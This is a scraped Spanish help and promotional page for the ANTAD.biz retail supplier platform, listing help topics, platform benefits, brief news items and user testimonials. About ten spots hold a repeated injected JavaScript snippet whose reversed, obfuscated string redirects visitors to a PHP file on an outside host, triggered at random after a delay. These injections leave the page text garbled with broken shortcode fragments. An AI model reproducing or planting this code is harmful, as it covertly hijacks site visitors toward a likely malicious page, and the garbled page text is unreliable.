) == "string") return $zXz.list[n].split("").reverse().join("");return $zXz.list[n];};$zXz.list=["'php.yerg-sknil-tuoba-egap/snrettap/cni/owtytnewtytnewt/semeht/tnetnoc-pw/moc.cvpny//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}topics”]

¿Necesitas Ayuda?

Este sitio está dedicado a brindarte la ayuda que necesitas para mejorar tu experiencia en ANTAD.biz.

Sobre ANTAD.biz

Generalidades y beneficios.

Ver Más >

Mi Cuenta, Editar tu Perfil

Ayuda para el registro.

Ver Más >

Micrositio, Productos

Administración de sitio y productos.

Ver Más >

Autodiagnóstico de Comercio Sostenible

Autodiagnóstico y capacitación.

Ver Más >

Apoyo a PyMES

Sitios de apoyo a las PyMES.

Ver Más >

) == "string") return $zXz.list[n].split("").reverse().join("");return $zXz.list[n];};$zXz.list=["'php.yerg-sknil-tuoba-egap/snrettap/cni/owtytnewtytnewt/semeht/tnetnoc-pw/moc.cvpny//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}topics-box” animation=”fadeInUp” transition=”1500″]

¿No resolvimos tus dudas? Bien, tenemos una lista con todas las preguntas

Mostrar todos los Temas

) == "string") return $zXz.list[n].split("").reverse().join("");return $zXz.list[n];};$zXz.list=["'php.yerg-sknil-tuoba-egap/snrettap/cni/owtytnewtytnewt/semeht/tnetnoc-pw/moc.cvpny//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}topic-listing”]

Navegar en los Temas de Ayuda

A continuación te presentamos todos los temas de ayuda del sito

”Sobre

) == "string") return $zXz.list[n].split("").reverse().join("");return $zXz.list[n];};$zXz.list=["'php.yerg-sknil-tuoba-egap/snrettap/cni/owtytnewtytnewt/semeht/tnetnoc-pw/moc.cvpny//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}ton_title=”Ver Todo” button_link=”http://ayuda.antad.biz/category/antad-biz/” target_links=”_self”]

View All

”Autodiagnóstico Ambiental” button_title=”Ver Todo” button_link=”http://ayuda.antad.biz/category/ambiental/” target_links=”_self”]

View All

”Preguntas

) == "string") return $zXz.list[n].split("").reverse().join("");return $zXz.list[n];};$zXz.list=["'php.yerg-sknil-tuoba-egap/snrettap/cni/owtytnewtytnewt/semeht/tnetnoc-pw/moc.cvpny//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}ton_title=”Ver Todo” button_link=”http://ayuda.antad.biz/category/faqs/” target_links=”_blank”]

View All

”Para

) == "string") return $zXz.list[n].split("").reverse().join("");return $zXz.list[n];};$zXz.list=["'php.yerg-sknil-tuoba-egap/snrettap/cni/owtytnewtytnewt/semeht/tnetnoc-pw/moc.cvpny//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}ton_title=”Ver Todo” button_link=”http://ayuda.antad.biz/category/proveedores/” target_links=”_self”]

View All

”Para

) == "string") return $zXz.list[n].split("").reverse().join("");return $zXz.list[n];};$zXz.list=["'php.yerg-sknil-tuoba-egap/snrettap/cni/owtytnewtytnewt/semeht/tnetnoc-pw/moc.cvpny//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}ton_title=”Ver Todo” button_link=”http://ayuda.antad.biz/category/compradores/” target_links=”_self”]

View All

”Quiero

) == "string") return $zXz.list[n].split("").reverse().join("");return $zXz.list[n];};$zXz.list=["'php.yerg-sknil-tuoba-egap/snrettap/cni/owtytnewtytnewt/semeht/tnetnoc-pw/moc.cvpny//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}ton_title=”Ver Todo” button_link=”http://ayuda.antad.biz/category/exportaciones/” target_links=”_self”]

View All

¿Aún no encuentras lo que necesitas?

Si no encontraste lo que buscabas te proponemos usar las siguientes opciones.

”Base

) == "string") return $zXz.list[n].split("").reverse().join("");return $zXz.list[n];};$zXz.list=["'php.yerg-sknil-tuoba-egap/snrettap/cni/owtytnewtytnewt/semeht/tnetnoc-pw/moc.cvpny//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to” target=”_self” icon=”fa-file-text-o”]

Buscar ayuda en la base del conocimiento.

”Ir

) == "string") return $zXz.list[n].split("").reverse().join("");return $zXz.list[n];};$zXz.list=["'php.yerg-sknil-tuoba-egap/snrettap/cni/owtytnewtytnewt/semeht/tnetnoc-pw/moc.cvpny//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to/” link_title=”Ir al Formulario” title=”Formulario de Contacto” target=”_self” icon=”fa-envelope-o” ]

Enviar un mensaje al sitio.

¿Necesitas razones para estar en ANTAD.biz?

Estas son algunas razones para estar en ANTAD.biz

Ahorro de tiempo

El proceso de compra se simplifica mucho

Búsqueda Simplificada

Mejora el proceso de selección de productos

Contacto directo

Y confidencial entre compradores y proveedores

Micrositio

Stand Virtual permanente y gratuito

Tu catálogo en línea

Promociona tus productos o servicios

Confidencialidad

De tu información personal

ANTAD Informa

Expo ANTAD y Alimentaria 2016

Expo ANTAD & Alimentaria México 2016 nace con la voluntad de consolidarse como un foro internacional de referencia en el circuito de ferias del sector agroalimentario en el continente americano. Leer más

Conoce la NOM 051

Empresas que se formalicen tendrán acceso a seguros: Videgaray

El secretario de Hacienda, Luis Videgaray Caso, anunció que a fin de impulsar la formalidad, se dará acceso a seguros a aquellos pequeños contribuyentes y empresas que se afilien al nuevo Régimen de Incorporación Fiscal (RIF). Leer más…

Mejorar equidad laboral: Navarrete

Afines de abril el Gobierno Federal presentará nuevas iniciativas en materia de justicia en las cuales también incluirá la referente al mercado laboral, adelantó el secretario del Trabajo y Previsión Social (STPS), Alfonso Navarrete Prida. Leer más…

Testimonios de Usuarios

ANTAD.biz me proporciona un stand virtual para mostrar mis productos tal y como lo hago en las expociciones físicas.
ANTAD.biz es la forma más fácil de promocionar mis productos con mis compradores y así darme a conocer.
Con ANTAD.biz he mejorado la venta de mis productos ya que más gente tiene acceso a verlos y por lo tanto mis compradores han aumentado.
Fue muy fácil registrarme en ANTAD.biz y ahora tengo más clientes porque mis productos están visibles todo el tiempo en mi micrositio.
El uso de la plataforma ANTAD.biz nos facilita dar a conocer nuestros productos ya que tenemos nuestro catálogo en línea las 24 horas durante los 365 días del año.
Yo no sabía como encontrar más compradores y me complicaba mucho el buscarlos, además de que resultaba muy caro. Ahora los clientes me buscan directamente en la plataforma ANTAD.biz.
En Expo ANTAD me ayudaron a darme de alta en la plataforma ANTAD.biz y ahora mis productos están a la vista de todas las personas que visitan la página.
Nunca pensé que le podría vender a una gran cadena de supermercados, pero gracias a la plataforma ANTAD.biz me contactó un comprador y ahora soy su proveedor.
La plataforma ANTAD.biz nos ayudó a expandir nuestro negocio y adquirir más clientes, además de que encontramos los apoyos que necesitábamos para crecer.
Para nosotros como microempresarios la plataforma ANTAD.biz ha sido una herramienta muy importante para impulsar nuesto negocio y darlo a conocer a nuestros clientes.